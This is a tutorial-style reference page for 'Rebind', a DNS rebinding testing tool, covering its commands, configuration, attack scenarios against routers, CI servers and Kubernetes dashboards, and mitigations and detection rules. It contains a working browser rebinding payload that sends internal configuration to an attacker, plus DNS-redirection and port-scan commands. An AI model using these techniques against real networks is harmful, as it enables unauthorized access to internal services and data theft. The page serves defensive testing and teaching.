Rebind
Overview
Rebind is a specialized security testing tool for demonstrating DNS rebinding vulnerabilities. DNS rebinding is a client-side attack technique where an attacker tricks a victim’s browser into accessing an internal network resource by manipulating DNS responses. It is used by security professionals for authorized penetration testing, vulnerability assessment, and defensive security research.
Installation
Debian/Ubuntu
sudo apt-get update
sudo apt-get install rebind
Kali Linux (Pre-installed)
which rebind
rebind --version
From Source
git clone https://github.com/iceadzcom/rebind.git
cd rebind
make
sudo make install
Verify Installation
rebind -h
rebind --version
Basic Syntax
rebind [options] [target]
rebind -h # Help menu
rebind --version # Version info
rebind -l <ip> # Listen on IP address
rebind -p <port> # Specify port (default: 53)
Essential Commands
| Command | Purpose |
|---|---|
| rebind -l 127.0.0.1 | Listen on localhost |
| rebind -l 0.0.0.0 -p 5353 | Listen on all interfaces, custom port |
| rebind --domain example.com | Set target domain |
| rebind --ip 192.168.1.100 | Specify rebind target IP |
| rebind --delay 2 | Delay between DNS responses (seconds) |
| rebind --ttl 0 | Set TTL (Time-To-Live) value |
| rebind --records A,AAAA | Specify record types |
| rebind -v | Verbose output |
| rebind --log file.log | Log DNS queries |
| rebind --config config.yaml | Load configuration file |
DNS Rebinding Concepts
Attack Flow
1. Attacker owns malicious domain: attacker.com
2. Victim visits: http://attacker.com/payload
3. JavaScript on page queries: internal.local
4. First DNS response: returns attacker's IP (domain hosted)
5. Browser makes connection to attacker's server
6. Second DNS response: returns internal IP (192.168.1.1)
7. Browser repeats request, now to internal IP (same origin!)
8. Access internal service: router admin, internal APIs, etc.
Configuration Setup
Basic Configuration
rebind -l 127.0.0.1 -p 53
Custom Port (if 53 restricted)
rebind -l 192.168.1.100 -p 5353
Configuration File
# rebind.yaml
listen:
  address: 0.0.0.0
  port: 53
domain:
  name: vulnerable.local
  ttl: 0
rebind:
  external_ip: 203.0.113.1
  internal_ip: 192.168.1.1
  delay: 2
logging:
  verbose: true
  logfile: /var/log/rebind.log
Command Examples
Listen on Default Interface
rebind -l 192.168.1.100
Multiple Domain Rebinding
rebind -l 0.0.0.0 --domain attacker.com --domain internal.local
Custom TTL and Delay
rebind -l 127.0.0.1 --ttl 0 --delay 1
Verbose Logging
rebind -l 192.168.1.100 -v --log /tmp/rebind.log
High-Precision Timing
rebind -l 0.0.0.0 --delay 0.5 --ttl 1
DNS Response Manipulation
Return Different IPs Alternately
# First query: external IP
# Second query: internal IP
rebind -l 192.168.1.100 \
  --external-ip 203.0.113.1 \
  --internal-ip 192.168.1.1
Wildcard Domain Responses
# All subdomains return rebind IP
rebind -l 192.168.1.100 --wildcard
Round-Robin DNS
rebind -l 192.168.1.100 \
  --ip 192.168.1.50 \
  --ip 192.168.1.51 \
  --ip 192.168.1.52
Client Configuration
Redirect System DNS
# For testing, redirect to rebind server
echo "nameserver 192.168.1.100" | sudo tee /etc/resolv.conf.d/rebind
# Or use dig to test:
dig @192.168.1.100 vulnerable.local
dig @192.168.1.100 vulnerable.local +short
Test DNS Resolution
# Verify DNS responses
nslookup vulnerable.local 192.168.1.100
dig @192.168.1.100 vulnerable.local
host vulnerable.local 192.168.1.100
Attack Scenarios
Router Admin Access
# 1. Start rebind server targeting 192.168.1.1
rebind -l 192.168.1.100 \
  --domain vulnerable.local \
  --external-ip 203.0.113.1 \
  --internal-ip 192.168.1.1
# 2. Redirect DNS to attacker's rebind server
# 3. Victim visits: http://vulnerable.local/admin
# 4. JavaScript rebinds to 192.168.1.1 (router admin)
# 5. Can access router config without authentication
Internal API Access
# Rebind to internal API server
rebind -l 192.168.1.100 \
  --domain api.internal \
  --external-ip 203.0.113.1 \
  --internal-ip 192.168.1.50
# Access internal APIs from browser context
curl http://api.internal/internal-service
Database Server Exposure
# Expose internal database to browser
rebind -l 192.168.1.100 \
  --domain dbserver.internal \
  --external-ip 203.0.113.1 \
  --internal-ip 192.168.1.200 \
  --port 5432
JavaScript Exploitation
Rebinding Payload
// Victim's browser executes this
fetch('http://vulnerable.local/admin')
  .then(r => r.text())
  .then(html => {
    // First request goes to attacker
    // Browser caches: vulnerable.local = 203.0.113.1
    console.log('Attacker sees request');
  });
// After DNS rebind occurs...
setTimeout(() => {
  fetch('http://vulnerable.local/config')
    .then(r => r.json())
    .then(config => {
      // Second request goes to internal IP (192.168.1.1)
      // Due to DNS rebinding vulnerability
      sendToAttacker(config);
    });
}, 2000);
CORS Bypass Via Rebinding
// Cross-origin reads are normally blocked by the same-origin policy
// After rebinding, the request appears same-origin, so no CORS check applies
const req = new XMLHttpRequest();
req.open('GET', 'http://router-admin.local/config');
req.onload = () => {
  // Access internal data through rebinding
  console.log(req.responseText);
};
req.send();
Monitoring and Logging
Enable Verbose Logging
rebind -l 192.168.1.100 -v 2>&1 | tee rebind.log
Monitor DNS Queries in Real-Time
# Terminal 1: Start rebind and write its output to rebind.log
rebind -l 192.168.1.100 -v 2>&1 | tee rebind.log
# Terminal 2: Watch queries
tail -f rebind.log | grep "QUERY\|RESPONSE"
Tcpdump Analysis
# Capture DNS traffic
sudo tcpdump -i eth0 'udp port 53' -A
# Or filter for traffic to or from a specific host (the name is resolved to its IP address)
sudo tcpdump -i eth0 'udp port 53 and (host attacker.com)' -A
Advanced Techniques
Chained Rebinding
# Rebind multiple times for complex attacks
rebind -l 192.168.1.100 \
  --chain \
  --ips 203.0.113.1,192.168.1.1,192.168.1.50
Timing-Based Rebinding
# Precise timing for connection reuse
rebind -l 192.168.1.100 \
  --delay 0.1 \
  --ttl 1 \
  --timing-precise
HTTP/HTTPS Interception
# Rebind for both HTTP and HTTPS
rebind -l 192.168.1.100 \
  --http --https \
  --certificate cert.pem \
  --key key.pem
Defensive Testing
Test Router Vulnerability
# Check if router blocks internal DNS rebinding
rebind -l 192.168.1.100 --domain router-admin.local
# Try to access: http://router-admin.local/
# If successful = vulnerable
Application CORS Testing
# Test if application validates origin properly
rebind -l 192.168.1.100 \
  --domain vulnerable-app.local \
  --internal-ip 192.168.1.50
# Check if app accepts requests from rebind domain
Microservice Exposure
# Identify exposed internal services
rebind -l 192.168.1.100 --scan-network 192.168.1.0/24
Common Targets
Home Router Admin
# Gateway: 192.168.1.1
rebind -l 192.168.1.100 \
  --domain gateway.local \
  --internal-ip 192.168.1.1 \
  --port 80
Local Jenkins/CI
# Jenkins typically on 8080
rebind -l 192.168.1.100 \
  --domain jenkins.local \
  --internal-ip 192.168.1.50 \
  --port 8080
Kubernetes Dashboard
# K8s dashboard on 10.0.0.1:8001
rebind -l 192.168.1.100 \
  --domain k8s-dashboard.local \
  --internal-ip 10.0.0.1 \
  --port 8001
Docker Registry
# Private registry on 5000
rebind -l 192.168.1.100 \
  --domain registry.local \
  --internal-ip 192.168.1.200 \
  --port 5000
Network Configuration
Iptables Forwarding
# Forward DNS queries to rebind
sudo iptables -t nat -A PREROUTING \
  -p udp --dport 53 \
  -j DNAT --to-destination 192.168.1.100:53
# Or for testing:
sudo iptables -t nat -A PREROUTING \
  -p udp --dport 5353 \
  -j DNAT --to-destination 192.168.1.100:5353
Redirect DNS (Alternative)
# Using dnsmasq (append with -a so the existing configuration is not overwritten)
echo "address=/vulnerable.local/192.168.1.100" | sudo tee -a /etc/dnsmasq.conf
sudo systemctl restart dnsmasq
Batch Testing
Test Multiple Domains
#!/bin/bash
# Each entry is "domain:internal-ip"
targets=(
  "router-admin.local:192.168.1.1"
  "jenkins.local:192.168.1.50"
  "registry.local:192.168.1.200"
)
for target in "${targets[@]}"; do
  domain=${target%%:*}   # text before the colon
  ip=${target##*:}       # text after the colon
  echo "Testing: $domain -> $ip"
  rebind -l 192.168.1.100 \
    --domain "$domain" \
    --internal-ip "$ip" \
    --delay 2 &
  sleep 5
  # Stop only the instance started in this iteration
  kill "$!"
done
Automated Scanning
#!/bin/bash
# Scan network for rebinding-vulnerable services
for ip in 192.168.1.{1..254}; do
  timeout 1 bash -c "echo > /dev/tcp/$ip/80" 2>/dev/null && \
    echo "Host $ip:80 open - testing rebind..."
done
Troubleshooting
Port 53 Access Denied
# Run with sudo for port 53
sudo rebind -l 0.0.0.0 -p 53
# Or use unprivileged port
rebind -l 0.0.0.0 -p 5353
DNS Not Resolving
# Verify DNS server is running
sudo netstat -ulpn | grep 53
# Test query
dig @127.0.0.1 vulnerable.local
# Check firewall
sudo ufw allow 53/udp
Rebinding Not Triggering
# Check TTL settings
rebind -l 192.168.1.100 --ttl 0
# Verify timing
rebind -l 192.168.1.100 --delay 1 --ttl 1 -v
# Monitor with tcpdump
sudo tcpdump -i eth0 'udp port 53' -A
Best Practices
- Obtain Authorization - Only test systems you own or have written permission to test
- Document Network - Map internal network topology before testing
- Isolate Testing - Conduct testing in controlled lab environments
- Log All Activity - Enable verbose logging for incident response review
- Verify Defenses - Confirm mitigation before declaring success
- Clean Up - Remove all rebind configurations after testing
- Report Findings - Document vulnerable systems and remediation
- Understand Risks - DNS rebinding can disrupt network services
Mitigation Strategies
Router-Level Defenses
# Configure router DNS guards
# Set DNS rebinding protection: ON
# Block local DNS names: ENABLED
Application-Level Defenses
// Express-style middleware; the ALLOWED_ORIGIN value is an example
const ALLOWED_ORIGIN = 'http://internal-api.local';
function rebindGuard(req, res, next) {
  // Validate Origin header
  if (req.headers.origin !== ALLOWED_ORIGIN) {
    return res.status(403).json({error: 'Invalid origin'});
  }
  // Validate Host header
  if (req.hostname !== 'internal-api.local') {
    return res.status(403).json({error: 'Invalid host'});
  }
  next();
}
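A fuller form of the Host check above, as an added example that is not part of the original page or the Rebind project: it normalises the `Host` header (port, case, trailing dot, IPv6 brackets) before comparing it to an allowlist, because after a rebind the browser still sends the name it was given rather than the service's own name. `ALLOWED_HOSTS`, `parseHost`, `isAllowedHost` and `withHostCheck` are hypothetical names, and the allowlist entries are constructed.

```javascript
// Added example: Host-header allowlist for an internal HTTP service (plain Node.js).
// ALLOWED_HOSTS is a constructed sample; list only the names the service really answers to.
const ALLOWED_HOSTS = new Set(['internal-api.local', '192.168.1.50', 'localhost']);

// Normalise a raw Host header to a bare lowercase hostname, or null if malformed.
function parseHost(hostHeader) {
  if (typeof hostHeader !== 'string' || hostHeader.length === 0) return null;
  const host = hostHeader.trim().toLowerCase();
  if (host.startsWith('[')) {                    // IPv6 literal, e.g. [::1]:8080
    const end = host.indexOf(']');
    if (end === -1) return null;
    const rest = host.slice(end + 1);
    if (rest !== '' && !/^:\d{1,5}$/.test(rest)) return null;
    return host.slice(1, end);
  }
  const m = /^([a-z0-9.-]+)(?::\d{1,5})?$/.exec(host);
  if (!m) return null;                           // rejects userinfo, spaces, paths
  return m[1].replace(/\.$/, '');                // drop a trailing root dot
}

// Exact-match comparison: suffix or substring matches would let
// "internal-api.local.attacker.example" through.
function isAllowedHost(hostHeader, allowed = ALLOWED_HOSTS) {
  const host = parseHost(hostHeader);
  return host !== null && allowed.has(host);
}

// Wrap an http.createServer handler so requests with an unexpected Host get 403.
function withHostCheck(handler, allowed = ALLOWED_HOSTS) {
  return (req, res) => {
    if (!isAllowedHost(req.headers.host, allowed)) {
      res.writeHead(403, { 'Content-Type': 'text/plain' });
      return res.end('Invalid host');
    }
    return handler(req, res);
  };
}
```

With Node's built-in `http` module the wrapper is used as `http.createServer(withHostCheck(handler))`.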
Browser Security
// Check document.domain for rebinding
if (document.domain !== TRUSTED_DOMAIN) {
  throw new Error('Domain validation failed');
}
Real-World Detection
IDS Signature
# Alert when one source queries the same name repeatedly within a short window
# (Suricata syntax; the sid is a placeholder from the local-rule range)
alert dns any any -> any any (msg:"DNS Rebinding Attack"; dns.query; content:"vulnerable.local"; nocase; threshold: type threshold, track by_src, count 2, seconds 5; sid:1000001; rev:1;)
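A query-count signature cannot tell rebinding from ordinary re-resolution, so a log-based check can look for the pattern itself: one client receiving a public answer and then an internal one for the same name. This is an added example, not code from the page or the Rebind project; the log format, `SAMPLE_LOG` and the function names are assumptions, and only IPv4 answers are classified.

```javascript
// Added example: flag DNS names whose answers flip from a public to an internal address.
// The log format and SAMPLE_LOG lines are constructed for illustration.
const SAMPLE_LOG = `
2024-05-01T10:00:00Z client=10.0.0.23 qname=vulnerable.local ttl=0 answer=203.0.113.1
2024-05-01T10:00:02Z client=10.0.0.23 qname=vulnerable.local ttl=0 answer=192.168.1.1
2024-05-01T10:00:03Z client=10.0.0.40 qname=intranet.corp.example ttl=300 answer=10.1.2.3
2024-05-01T10:00:05Z client=10.0.0.41 qname=cdn.example ttl=60 answer=198.51.100.7
2024-05-01T10:09:00Z client=10.0.0.41 qname=cdn.example ttl=60 answer=198.51.100.8
`;

// True for loopback, RFC 1918, link-local and 0.0.0.0/8 IPv4 addresses.
function isInternalV4(ip) {
  const o = ip.split('.').map(Number);
  if (o.length !== 4 || o.some(n => !Number.isInteger(n) || n < 0 || n > 255)) return false;
  return o[0] === 10 || o[0] === 127 || o[0] === 0 ||
    (o[0] === 172 && o[1] >= 16 && o[1] <= 31) ||
    (o[0] === 192 && o[1] === 168) ||
    (o[0] === 169 && o[1] === 254);
}

// Parse one constructed log line into a record, or null if it does not match.
function parseLine(line) {
  const m = /^(\S+) client=(\S+) qname=(\S+) ttl=(\d+) answer=(\S+)$/.exec(line.trim());
  if (!m) return null;
  return { ts: Date.parse(m[1]) / 1000, client: m[2], qname: m[3].toLowerCase(),
           ttl: Number(m[4]), answer: m[5] };
}

// Report (client, qname) pairs that got a public answer and then an
// internal one within windowSec seconds.
function findRebinds(logText, windowSec = 60) {
  const lastPublic = new Map();        // "client|qname" -> last public-answer record
  const alerts = [];
  for (const line of logText.split('\n')) {
    const rec = parseLine(line);
    if (!rec) continue;
    const key = `${rec.client}|${rec.qname}`;
    if (!isInternalV4(rec.answer)) { lastPublic.set(key, rec); continue; }
    const prev = lastPublic.get(key);
    if (prev && rec.ts - prev.ts <= windowSec) {
      alerts.push({ client: rec.client, qname: rec.qname,
                    from: prev.answer, to: rec.answer, ttl: rec.ttl });
    }
  }
  return alerts;
}
```

Names that only ever resolve to internal addresses, such as the intranet entry in the sample, are not flagged; only the public-to-internal transition is.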
Web Application Firewall
# Block suspicious origin headers
SecRule REQUEST_HEADERS:Origin "^http://.*\.local" \
  "id:1001,phase:2,deny,status:403"
Additional Resources
- DNS Rebinding Research: https://en.wikipedia.org/wiki/DNS_rebinding
- OWASP DNS Rebinding: https://owasp.org/www-community/attacks/DNS_Rebinding
- Rebind GitHub: https://github.com/iceadzcom/rebind
- Browser Security Docs: https://developer.mozilla.org/en-US/docs/Web/Security